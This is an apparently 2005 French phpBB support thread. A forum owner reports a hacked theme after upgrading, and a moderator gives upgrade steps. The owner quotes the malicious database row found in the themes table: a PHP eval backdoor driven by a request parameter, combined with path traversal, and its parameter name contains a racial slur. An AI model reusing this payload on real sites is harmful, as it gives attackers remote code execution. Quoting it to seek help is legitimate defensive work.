la-loutre Polichinelle
|
Posté le: Mar 07 Juin 2005 à 0:08 Sujet du message: hack des themes sur 2.0.15 ! |
|
|
bonjour,
je suis passé directement de la .11 à la .15, tout c'est bien passé , il ya ecrit ".15" en bas
mais je viens de me faire hacker mon theme par un bug relevé sur une vielle version
je vais voir dans les codes a modifier dans les fichersd, le patch ne l'a pas fait !
http://www.phpbb-power.com/forum/ftopic510.php
Notamment les themes sur ce didacticiel
Comment celà se fait ? celà veut il dire que j'ai des trous de partout ?
Je ne dois pas faire confiance aux patch ?
merci d'avance car là ca m'a stressé
voici le pb que j'ai eu
INSERT INTO `phpbb_themes` VALUES (2, 'aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp', 'FI Black', 'fiblack.css', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'row1', 'row2', '', '', '', '', 0, 0, 0, '', '006699', 'ffa34f', 'cc', 'bb', 'a', 0, 0);
avez-vous un solution pour que celà n'arrive plus ? car ormis remettre l'ancienne table le pb persiste, le trou n'est pas bouché ! :'(
 |
|
Alcazarfr Moddeurs

Inscrit le: 04 Nov 2004 Messages: 2408 Localisation: Dans le port d'Amsterdam, [...]
|
Posté le: Mar 07 Juin 2005 à 14:52 Sujet du message: |
|
|
1. Tu ne peux pas passer de la .11 à la .15, tu dois faire les mise à jour une par une (désolé...)
2. As tu des mods ?
3. Si non, télécharges phpBB 2.0.15a en françaissur un forum de support officiel et écrases les fichiers que tu as (n'uplodes pas /install et /contrib, ni config.php )
4. Charges ta BDD |
|